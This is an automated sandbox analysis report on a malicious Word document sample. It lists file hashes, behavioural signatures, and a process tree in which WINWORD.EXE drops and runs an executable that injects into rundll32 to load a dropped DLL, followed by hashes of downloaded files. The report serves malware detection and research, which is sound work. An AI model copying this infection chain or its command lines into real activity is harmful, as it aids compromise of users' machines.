Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system -
submitted
20-05-2024 04:19
Behavioral task
behavioral1
Sample
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
-
Size
392KB
-
MD5
5d26fff174b5864a0fd899ccb8c9a3fb
-
SHA1
dd8726066ddae317bb9415b994e82b8d3c89eb18
-
SHA256
54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
-
SHA512
524fdc7a602a22d6a0cc662fb89ed3a69491177414f40ede8a0441e2f02292d57b505e6ba03804f413a70f825e41f1420e258128a43967257c515a7fc1ce0246
-
SSDEEP
6144:niIpBWik+MmAQoMfMWDceTo59x9r+RSwujd+Ao7pt:iIprkNmAQo0MWDcTbKQTjLott
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
xea_kueou0.exe
pid | process
3040 | xea_kueou0.exe
-
Loads dropped DLL 1 IoCs
Processes:
WINWORD.EXE
pid | process
2284 | WINWORD.EXE
-
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXE
pid | process
2284 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
xea_kueou0.exe
pid | process
3040 | xea_kueou0.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
xea_kueou0.exe
description | pid | process
Token: SeDebugPrivilege | 3040 | xea_kueou0.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXE
pid | process
2284 | WINWORD.EXE
2284 | WINWORD.EXE
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WINWORD.EXE, xea_kueou0.exe
description | pid | process | target process
PID 2284 wrote to memory of 3040 | 2284 | WINWORD.EXE | xea_kueou0.exe
PID 2284 wrote to memory of 3040 | 2284 | WINWORD.EXE | xea_kueou0.exe
PID 2284 wrote to memory of 3040 | 2284 | WINWORD.EXE | xea_kueou0.exe
PID 2284 wrote to memory of 3040 | 2284 | WINWORD.EXE | xea_kueou0.exe
PID 2284 wrote to memory of 2888 | 2284 | WINWORD.EXE | splwow64.exe
PID 2284 wrote to memory of 2888 | 2284 | WINWORD.EXE | splwow64.exe
PID 2284 wrote to memory of 2888 | 2284 | WINWORD.EXE | splwow64.exe
PID 2284 wrote to memory of 2888 | 2284 | WINWORD.EXE | splwow64.exe
PID 3040 wrote to memory of 1384 | 3040 | xea_kueou0.exe | rundll32.exe
PID 3040 wrote to memory of 1384 | 3040 | xea_kueou0.exe | rundll32.exe
PID 3040 wrote to memory of 1384 | 3040 | xea_kueou0.exe | rundll32.exe
PID 3040 wrote to memory of 1384 | 3040 | xea_kueou0.exe | rundll32.exe
PID 3040 wrote to memory of 1384 | 3040 | xea_kueou0.exe | rundll32.exe
PID 3040 wrote to memory of 1384 | 3040 | xea_kueou0.exe | rundll32.exe
PID 3040 wrote to memory of 1384 | 3040 | xea_kueou0.exe | rundll32.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1
3⤵
PID:1384
-
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2888
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
17KB
MD580e6b6298435366fbd0ee749285a0669
SHA11272804741af03c2a7301c95f003a6b1fc402498
SHA2566e17d4806ad994005ed45a9b37f5d6e4966586a5ffa0ca7aaae4b8891d1120da
SHA5122ea13fcb713264a37ed49e5e00259f17ee53a4d6a2194ad54bcf8f387af207e7d035179643d93ae6e4fd96a423db38453e63d9bab7834550f1f6186992391b97
-
Filesize
3KB
MD52317e5a12ff2f18c11305ba77e24fedf
SHA17fae7ed923cc7f21a50bd3a154a0453c651ae6c1
SHA2563ccc22a7e678234dfed8147449525e54d0566042476c739d229c320e27a37904
SHA512bd3df932a58655e5344cdaab435c869545fbf6e522ff6f9fb1d61200291479fb0fbcb8da232462d81897014403ada2ec5090af88fef42ffb4c3df2048e4b6230
-
Filesize
7KB
MD5a699d20e9183f442024e6cbb9a77996c
SHA1d3dde9339283a6c1dfc0b519cafc35ffd1f19561
SHA25630297fa171f447665cb86e067f7b66a4661d9a552adb781148092ad6f8b25455
SHA512a6c8d816b57bca9c0b8b8785cf1117febae6a8a533999e97dffc7d3e46a8820a902f81c78721abf7f4d4c81873e1d5bc9dc8c464aeb781166356353db4a2d2df
-
Filesize
11KB
MD5682faa58139dfc4c2a096dc8936da569
SHA1f1a79e28b879886b432b1aa099153b1476cce921
SHA256f15a896a451d4de419df02d3f40712a4a246c30844b3f0cf672e47d7ca04703f
SHA512b65da741a0471e7d66ef67b9ab48fc769b97eb4e28c4783bc8381fd8c91ecfec5fdea20ef14f2b9bf16e2b063afe1abb1263b691ced8dc7812ebb112a123cd0f
-
Filesize
14KB
MD5c43bcccef0cd6ade752bb2c4df7caee1
SHA152716195b02f2e10116155c438a49b37e02a2ba7
SHA256abff4dfa063ed3d37f9c8dbe6ea532ea564cecf481f87e69bc85012d9546d6c7
SHA5125790d1ebd0a6a70cf5ea48f0910ebe2fd01d5f8cdc31b1af2845b6a9ad5f68a8b9948caf650a57dcd98e57df7302bcd05de87d0306357a356f54e3887fce466d
-
Filesize
2KB
MD501310ec53625886957d2d605a0705ee4
SHA1b61a2c3b4493c7aef1feb64d938bd82c3350dd9d
SHA25637a8bbd939fdd05e3b48bb816e882a5f11f16a599a5f315f221afc7dbd0a0dd0
SHA512c188c23da16da33b6b9d7700eb084ebf1fb0c0d8345c1673dc4a5a3a32f14bb2cf5626e924974f64fd1b185aa370244285246c75ac2efc36432b6dea25212e00
-
Filesize
5KB
MD53ebe6da806cd7f2fc52587711bef790c
SHA194a9c82f84d66de7850f7ce9bf721577a353293c
SHA25631eb034f8981d43a6c6f33a8a073478240eedd7097361a863be1181422c85b31
SHA5121cf71402e0bb1fdc211fc4b1f24d9bf16f8517088cc231ea2f63bc7b5dc75217dcdcdf6a5b698ebf10c8d70ea0a7f85c275456501ecd2c141d15e8543175f30c
-
Filesize
2KB
MD50b2cf5e1ac2ae1ea802e19cbca49051f
SHA1ea667dbdcd0d4c3272f8d96326e7331a4712e3ff
SHA2562f85dab515c9c9246cf0fc9d0c3bb42be4cc442d15a8bc56c970781bc3b1d231
SHA51222dcf49c5f3524c0098e175d98ec092c87191ce93dcf3e1be86d5b07dd702add436252545e8a5e36640619bbae8d19946dba9290ecf29cbf30a85f998bc608d4
-
Filesize
7KB
MD58460c01da494f631643fc26b6089de5d
SHA1561d8ed7534ff70be5ba899c12ce89178c8f1aac
SHA256e3af28e0c1a0de76afbf0956520d8415adb5ca481d9e8af41ab92bb18538e8e7
SHA5127cc3c60da69d31c964c870f26ffae98702eb66e7553cc335a7b16841700bb8f7e6b07863248c3df5cf25b0a930f8df97ff9259590cfe7ce57631c6c942eeea45
-
Filesize
15KB
MD5cbd14e01245df6c5c7ba1c02f9012bfb
SHA1a286e3eb786b5390481c754ec8340f29151f63e4
SHA25689bf576183e6a67385ad75bdd8eebc0b4ba9aff2e3fb95db125928de70e7eedd
SHA5129174fa17adec27b3c9a113bbb62dc1802e3af1d77f387b38cfcbd685859d652bbbe320a2be1473366498aef032e930fc4cd589ed0eaae8da718d96d1446527ab
-
Filesize
3KB
MD59db8b85638082548823b9da7a5496963
SHA14fe83d94144a4a45a4f70cc8d4608dcccf7c3d75
SHA256abcca25ecd6be168d4013db69836d75626a1af9d921016c35ac54fed72b4d4b9
SHA512227396b8bdcfe588b26899af2ee29a117fbaf4acf2fcdc24ad9e5422090ffe748ae3f67a88d61ac73ca9b65f7ab876bb3b05032c4756d6e87669bc957aee5258
-
Filesize
8KB
MD5461d21104ec5efad438b578712112cf4
SHA1629a98883436148703786469b66e652e8a0f0032
SHA25615bee3e93abc1fe748837e1bfce817257a6170e48c38381c58a811cd49bce894
SHA512ac640df18b404c85ae7bc6222ab9a7f68a27011a6e02297d42e6edc88f4f708c59e48dd85570ef5a3eb37f140965c90ec8555ff35561bf1a86795abffea8e423
-
Filesize
10KB
MD5ef2bc3cfaa2efe20aabea53e0779c8c1
SHA1af1285eaba2a85a6cdd5a29d64736b8d833b99fc
SHA256c79097b672963d913d9d6895897e3deab7854506001ce605456bddcecccddb02
SHA51252fb4ced0dd9b78ddf4ba59f33eda68c11adfca55ff909cc888b30f9b2e01270d0c13d7ed272b385a9c5866283db41bdde1482421fd5d8c13dccec3bece87853
-
Filesize
22KB
MD58bad26347fa9efd07e760ae53c1b9fd5
SHA13d282b9b131fcb240d7040926a7e56a5f3793f09
SHA2567c994f4f914f89b186d8120d78e1d2519195078a4cdfad9d64b94b649d67eb29
SHA5125340d53aac77b36dc2b746695d013d9900130bd22bf90853ea23d6934816534d90b42c826bf04fca1fe4bda3b407cd4f40b8a94a6c48ca8bf24661d8567866d6
-
Filesize
65KB
MD5a548c6d2b61a2ba99da566c1c639e55a
SHA1060593b5742e7aba2445314d7df214d3993e577f
SHA256d22b122fb81fd51b6630e0ea9ccbb2e149b3f8fd6c5a775195ad5189a924e290
SHA512e98ca7585dc96bbf2b94b254d75d49e4d2b481f399f41eaec1701ddef56ea260f5940ea855b87a3c8d120be0cc4e5e93e339488cf4be289b9856255f9bc0307e
-
Filesize
14KB
MD5f7fec7ce76ce7c8f1163b8aa5275c791
SHA17d49acc9bb5a17c254dfb9c9a0098d404e5bfeae
SHA25661722545a8661420eccbbacc9282e4f0631be3d171a7b01d4110345aa3447380
SHA5121baaece78e8548681e0e6b856211d3ba6c15ca26c43e53e8b207da6cb78bc559fb2c1996d3526a875f52b3fdd48dd0eb3396a629d033661e18578f3288274f5d
-
Filesize
9KB
MD55263f71bd3646e84bd7fc85b6ea9db82
SHA117bf79fc85c4afe74b561170b9e9dc6ddfb24c9e
SHA2560c48f1c3d1ce28f9a731121b1b4277c42460833ecf55f50abbc65a894c0ed79f
SHA51235b9aab906a4a2332cda05cb3b49abb34c97a0b11faede6919d1c0094bc2d42a4dfec4a95f6dd491bcafa83a831608151826f53fb81382ce8d94730d6d378d9a
-
Filesize
8KB
MD558dc7224876f5c315affada9b6d31ec0
SHA1038d2291e2dbdad36de0b6d2a5e6a5e010c3625f
SHA25625dcc5894bc9d2a6076335628d93889a577b96cfd13b5cd61c0b98a87252c6a1
SHA5127954d0c56b3d41198c254cd83244a8da601ba543aea58dbff3b3ab49791af4dd703379f990d8be5dea1facc137ca2fca8cc9aed7e26057b14d6a76aa3fa4237d
-
Filesize
10KB
MD52aea98fd18732dbe5ef981972066d792
SHA10b8a4f1d22ee1f6c6bfc198ea5b93f1c069d7108
SHA2568de3b47d4eb2e6c654e7d7dca70e37ff6b54d79e20c8d4dbeb34bc446fbf199b
SHA512325b775ba60bd02c076d53d6cf83cfb258cbdc407de7a2f94e4082990ef703b1694b8166aea1087f693e4e80610e20315857e271b1bdf13220321dad8959331d
-
Filesize
11KB
MD5dbab4e4140567be30543ab4d75e3afe1
SHA13269f9c8e782c0d6e7f0758dc878fa564d84c662
SHA256acd99c48cdb14fc9d2d8ee365f2754788f6ba869a93fe1494499b8c8dc1fbe4e
SHA512cf72228bd8be186368c820b25e9ec941845388c15b08977e1796cbe7ec7e489151f82fd7f54ae500fdc90d129d0864e14f32761724aaa2274cb3164aac5d5789
-
Filesize
10KB
MD550d40aa5970a473d43ddc7e3c0694bab
SHA169229fd4a6ef26af1afcf60db2ea632f3a904479
SHA25631363c19af1b7236006d0f53387d9b9f205e5efc3b0c2e4f4219c6f5b5fc2321
SHA5124328369c01cc6d710fc7e115f16f43d85a8cdcffb2fb0ef977ee1d18a179edbb61ac798aaa49cdc419e662d2d49b6668267260f4b4f9c88228aaf0f0ed2164ae
-
Filesize
5KB
MD58048ea039eec039740d9a77d6ffbeb34
SHA1f99c97867c0a4b3d3c5f432b2f7e8c4e8cb80eee
SHA256048e15330a90c48994b36a477176d9585b0e3d6f9014946841c390d6377594d5
SHA512a9895ab9b91f2c7cdc8174d9f802b897f81a31393bf22190f3803bc0e5e6c0c7061bfe4c18363967c5c24e03923bd791877439d80fb3ad7794264c1cbdecf506
-
Filesize
9KB
MD59284a716d74a13f85b4356f85a537c5e
SHA193c205267b4caa84bb9f12812e7fe248d292cd3c
SHA256329bcf12d10e58bc3f4ff1ec1971e65e8047fa87a53f52c9d93fc1ea4d77ecc7
SHA5125f4a5df022cacaac15dac9f9b1c49cbe6764187fba480302cbbfa2b6ba95ad6e71a66fd7c5edc4d690c1a453984f3df749af47bce1ad2627b5d183ea3bb1ccdb
-
Filesize
26KB
MD54e79b2ac32485ef82a86d4ef7eb4914a
SHA12bda8a43b3f525e1e14112c14a26bdcbce31fbbc
SHA256188a6d34cc2f854717d678a469db49a5a31f7b963671cf53b79e6cad93ed976b
SHA512d75c3c409bc54a154ab5c06d7a749cbd5de32e7f7e97e1f167e04d3933f2cc54733a257ff715119275458d3f1f6b5823ba9a19082cc36c4563ebc1d8bf987e1d
-
Filesize
16KB
MD514c40e004e30570838666afb9d3e0ac7
SHA1525b5b40939ba7783c9ee30abc9ec22d39b164ac
SHA2560e5e2f9648031ccdec84e092411833180df9a2caf85c7d56bb2339dc42462747
SHA512e32a88ac639be91787eb6690fc9a215abb7b1e720265de70150e67a08fdf22187242794c5096c2ab2a4568cf8c4f973a6ece1083724f24c1f864c82794bb07f3
-
Filesize
10KB
MD52d02f5a7e119b47f65ffec2b0d964b8f
SHA1d7001e1a383d8dd6d95083e8402b72c0a35ebb29
SHA25669acbd84619353baab030891edc5b5bd572d71ac4aaf79aa3abc0035baf1d901
SHA512f7412522b3ba45f0f926ee072f1358d1cc2d8a1faf8e883d134fae47de82064e5be3f50955ecb9333683ea135af38d043e0845501185a3e2816afa175721ca86
-
Filesize
20KB
MD5971725ce794c620315c14c3f81237595
SHA165db3fbac64d4dd5689f130de853ff3c5059c280
SHA2563a556c634df4b0aa3ad41133d0afa3fc488b88a7f9cb50a1cb329dfd96f5cb4e
SHA512d0dbcb64f331a215d993ca32841888d5cf50414540d18d0630c6d1e9498c36c1d4c9ef253b4e6d9760cfbb2cf7a9a579c85fed9b48c644f49550e18ab44266a6
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f